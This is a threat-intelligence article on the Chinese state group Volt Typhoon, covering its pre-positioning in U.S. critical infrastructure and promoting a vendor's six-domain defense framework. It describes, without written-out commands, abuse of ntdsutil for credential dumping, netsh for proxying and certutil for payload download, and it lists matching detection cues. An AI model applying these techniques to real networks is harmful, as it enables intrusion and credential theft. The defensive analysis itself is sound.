Volt Typhoon
Volt Typhoon is a People's Republic of China (PRC) state-sponsored advanced persistent threat group that has pre-positioned itself inside U.
Last updated Apr 11, 2026
Continue your mission
Volt Typhoon is a People's Republic of China (PRC) state-sponsored advanced persistent threat group that has pre-positioned itself inside U.
# Volt Typhoon
Volt Typhoon is a People's Republic of China (PRC) state-sponsored advanced persistent threat group that has pre-positioned itself inside U.S. critical infrastructure networks with the explicit goal of enabling destructive attacks during a future military conflict. This is not an espionage operation. Volt Typhoon is not stealing intellectual property or collecting diplomatic intelligence. It is conducting the cyber equivalent of placing explosives near critical infrastructure and waiting for the order to detonate.
The group was publicly attributed to the PRC by the U.S. Cybersecurity and Infrastructure Security Agency (CISA), the National Security Agency (NSA), the Federal Bureau of Investigation (FBI), and partner agencies across Five Eyes nations in May 2023, via Joint Cybersecurity Advisory AA23-144A. A follow-up advisory (AA24-038A) in February 2024 specified that Volt Typhoon had maintained access inside some critical infrastructure networks for five years or more, specifically pre-positioning for "disruption or destruction of critical services in the event of a major crisis or conflict with the United States."
The targets are deliberate and strategic: energy grid operators, water and wastewater systems, transportation networks, telecommunications providers, and seaports. Geographic focus includes Guam (home to significant U.S. military infrastructure), Hawaii (Pacific Command headquarters), and critical infrastructure on the U.S. mainland that supports or is adjacent to military installations. The operational purpose is clear: if the United States and China enter military conflict over Taiwan, Volt Typhoon gives the PRC the ability to disrupt the logistics, communications, and public services that the U.S. military depends on domestically.
This is a paradigm shift in how cybersecurity professionals must think about nation-state threats. The threat is not primarily about data. The threat is about sabotage capability that sits dormant inside networks, invisible and patient, waiting for a geopolitical trigger that may be months or years away.
CISA, NSA, and FBI designated Volt Typhoon as a PRC state-sponsored actor based on technical indicators, infrastructure overlap, and target selection consistent with PRC strategic interests. The group's targeting of Guam, in particular, made strategic intent clear. Guam hosts Andersen Air Force Base, Naval Base Guam, and is the westernmost U.S. territory in the Pacific: the forward operating location most critical to any U.S. military response to a Taiwan contingency.
Salt Typhoon, a parallel PRC operation that targeted U.S. telecommunications companies and compromised the communications infrastructure used by senior government officials and law enforcement wiretap systems, represents the intelligence collection complement to Volt Typhoon's pre-positioning mission. Where Salt Typhoon collects intelligence about U.S. decision-makers and communications, Volt Typhoon builds the capability to disrupt the infrastructure those decision-makers depend on. The two operations together constitute a coherent PRC strategy for achieving information dominance and infrastructure leverage over the United States in a conflict scenario.
Volt Typhoon's defining operational characteristic is its exclusive reliance on living-off-the-land (LOTL) techniques. The group does not use custom malware. It does not deploy the backdoors, remote access trojans, and custom implants that most threat intelligence frameworks are built to detect. Instead, it uses the tools that already exist on every Windows network: native operating system commands, legitimate administrative software, and built-in scripting capabilities.
Documented LOTL tools used by Volt Typhoon include:
wmic (Windows Management Instrumentation Command-line): used for remote system management, process enumeration, and lateral movement.
ntdsutil: a legitimate tool for Active Directory database maintenance that Volt Typhoon uses to dump Active Directory credentials in a compact, portable format.
netsh: the Windows network configuration command-line tool, used by Volt Typhoon to configure port forwarding and proxies that tunnel traffic through compromised systems.
PowerShell: Windows' native scripting environment, used for remote execution, reconnaissance, and data staging.
certutil: the Windows certificate management tool, abused to download additional tools from command-and-control servers by encoding payloads in Base64 to bypass content filters.
The LOTL approach achieves two things simultaneously. First, it makes detection dramatically harder: there is no malicious binary to detect, no malware signature to match, and no unknown process to alert on. Security tools that focus on detecting malicious software cannot catch an attacker using only legitimate software. Second, it allows the actor to blend into the noise of normal IT operations on large networks where administrators routinely use these same tools for legitimate purposes.
Volt Typhoon consistently targets edge network devices as its initial access vector. This includes small office/home office (SOHO) routers, VPN concentrators, firewalls, and other network appliances that sit at the perimeter of target networks. These devices are frequently unpatched, run outdated firmware, have weak default credentials, and are often not monitored with the same rigor as workstations and servers.
Specific device types compromised by Volt Typhoon include Cisco, Fortinet, and NETGEAR edge devices. The group exploits publicly known vulnerabilities in these products, sometimes within days of CVE publication. Once a perimeter device is compromised, it serves two purposes: it provides persistent access to the internal network, and it becomes part of a covert relay network (KV-Botnet) that proxies Volt Typhoon's command-and-control traffic through legitimate-looking infrastructure to frustrate attribution and network traffic analysis.
The February 2024 CISA advisory documented Volt Typhoon maintaining persistent access inside critical infrastructure networks for five years or more without detection. This long-dwell capability is only possible because of the LOTL approach combined with careful operational security. The group limits data exfiltration to minimize anomalous network traffic. It operates during normal business hours in the target's time zone to blend with legitimate administrative activity. It routes traffic through compromised SOHO routers (the KV-Botnet) to make connection origins appear domestic and mundane.
The five-year dwell time means that organizations cannot rely on periodic security assessments or annual penetration tests to detect this threat. An assessment conducted in 2023 would not have caught access established in 2018 if the attacker had maintained sufficient operational security throughout.
Pre-positioning for destructive operations means establishing the access, lateral movement, and execution capability needed to cause harm at a future time of the attacker's choosing, without re-entering the network. Volt Typhoon has mapped critical infrastructure networks, identified operational technology (OT) systems that control physical processes, and established the access needed to disrupt those systems on command.
The targets are the specific systems whose disruption would impose maximum cost on U.S. military operations and civilian morale: power generation and distribution, water treatment and delivery, port logistics, transportation control systems, and the telecommunications backbone. Disrupting these systems simultaneously during the opening hours of a military conflict would strain emergency response, divert domestic attention, and complicate military logistics in ways that degrade U.S. operational capability without firing a single kinetic weapon.
Volt Typhoon represents the most serious long-term cyber threat to U.S. critical infrastructure ever publicly documented by U.S. government agencies. The significance is not technical; it is strategic. This is not an actor that broke into networks to steal data and leave. This is an actor that broke into networks to stay, map the environment, establish execution capability, and wait for a geopolitical event that may not occur for years.
The implications for how organizations think about cybersecurity are profound. Compliance-based security, which measures whether controls are in place at a point in time, cannot detect or prevent this threat. A network can pass every security audit and still host a Volt Typhoon implant built from legitimate administrative tools that no audit checklist covers. The threat requires continuous behavioral monitoring, not periodic assessment.
The geographic concentration on infrastructure adjacent to military installations confirms the strategic intent. Volt Typhoon does not appear to be collecting commercial intelligence. It is specifically targeting the infrastructure that U.S. military operations depend on domestically: power, water, logistics, and communications in the regions that host Pacific Command, Air Force installations, and naval bases.
Salt Typhoon's parallel compromise of U.S. telecommunications networks, including the infrastructure used for lawful intercept wiretaps by the FBI and other agencies, compounds the threat. The PRC has built capability to both listen to U.S. government communications and disrupt the infrastructure the U.S. government depends on. These are not separate operations; they are complementary elements of a coherent pre-conflict strategy.
Volt Typhoon is the threat that makes the case for the Planetary Defense Model more forcefully than any other actor. The group's tactics simultaneously expose weaknesses across all six PDM domains, and defense against Volt Typhoon is only effective when all six are addressed simultaneously. This is not a theoretical claim. It is a direct consequence of how Volt Typhoon operates.
VSD (Vulnerability and Surface Defense): Volt Typhoon's initial access comes through edge devices with unpatched vulnerabilities. The Continuous Surface Reduction (CSR) methodology addresses this directly: every internet-facing device is a potential initial access vector, and CSR's mandate of continuous exposure reduction applies to every SOHO router, VPN appliance, and firewall on the perimeter. Organizations that have not reduced their edge device attack surface are providing Volt Typhoon with the initial foothold it needs.
SPH (Security Posture and Hygiene): LOTL techniques defeat endpoint detection tools that rely on malware signatures. Autonomous Posture Command (APC) responds to this by establishing behavioral baselines for administrative tool usage on every system: which accounts use ntdsutil, when, from where, and for what purpose. Deviation from that baseline triggers investigation regardless of whether any malware is present. APC is specifically built for the class of threat where the attack uses no malicious software.
IAT (Identity Access and Trust): Volt Typhoon abuses legitimate administrative credentials. Zero Possession Architecture (ZPA) limits the blast radius of credential compromise through just-in-time access provisioning: administrators receive elevated access only for specific tasks during specific time windows, not standing administrative rights that an attacker can inherit. ZPA's principle of "Trust nothing. Possess nothing. Verify everything." denies Volt Typhoon the persistent administrative access it needs to move laterally and establish execution capability.
DPS (Data Protection and Sovereignty): Volt Typhoon's pre-positioning mission includes preparation for data destruction and operational technology disruption during a conflict. The Sovereign Data Protocol (SDP) ensures that critical operational data has sovereign, air-gapped backups that survive the network disruption the attack is designed to cause. SDP addresses the recovery dimension: what happens after Volt Typhoon executes its pre-positioned access.
TID (Threat Intelligence and Defense): Detection of Volt Typhoon requires behavioral threat hunting, not signature detection. Predictive Defense Intelligence (PDI) builds the detection pipeline that can find LOTL behavior: unusual netsh invocations, ntdsutil executions outside maintenance windows, PowerShell remoting to unusual endpoints, and traffic patterns consistent with the KV-Botnet relay architecture. PDI maps documented Volt Typhoon ATT&CK techniques to behavioral detection rules that fire on what the attacker does, not what tools they carry.
RGA (Risk Governance and Assurance): Critical infrastructure operators regulated under NERC CIP, AWIA 2018, and other sector-specific frameworks have mandatory incident reporting obligations. Perpetual Compliance Assurance (PCA) ensures that compliance posture does not degrade during an active incident, a requirement that is genuinely difficult when the incident involves a five-year-old persistent access that regulators must now be notified about. PCA provides the compliance infrastructure that allows organizations to respond to Volt Typhoon while maintaining regulatory standing.
CDA's Shield visualization, which displays an organization's defensive posture across all six PDM domains simultaneously, makes the all-domain exposure to Volt Typhoon visible in a single view. An organization with strong TID capability but weak VSD (unpatched edge devices) shows exactly the gap that Volt Typhoon exploits for initial access. The Shield does not let organizations hide a weak domain behind strong performance in others.
Morgan, Evan. "Eroding Global Stability: The Cybersecurity Strategies of China, Russia, North Korea, and Iran." Irregular Warfare Initiative, Princeton University / Modern War Institute at West Point, November 2025.
Cybersecurity and Infrastructure Security Agency, National Security Agency, Federal Bureau of Investigation, and partner agencies. "PRC State-Sponsored Actors Compromise and Maintain Persistent Access to U.S. Critical Infrastructure." Joint Cybersecurity Advisory AA24-038A. February 2024.
Cybersecurity and Infrastructure Security Agency, National Security Agency, Federal Bureau of Investigation, and partner agencies. "People's Republic of China State-Sponsored Cyber Actor Living off the Land to Evade Detection." Joint Cybersecurity Advisory AA23-144A. May 2023.
Microsoft Threat Intelligence. "Volt Typhoon Targets U.S. Critical Infrastructure with Living-off-the-Land Techniques." Microsoft Security Blog, May 2023.
Lumen Technologies Black Lotus Labs. "The KV-Botnet: A Highly Sophisticated Botnet Operated by Volt Typhoon." Lumen Threat Intelligence, December 2023.
CDA Theater missions that address topics covered in this article.
Written by Evan Morgan
Found an issue? Help improve this article.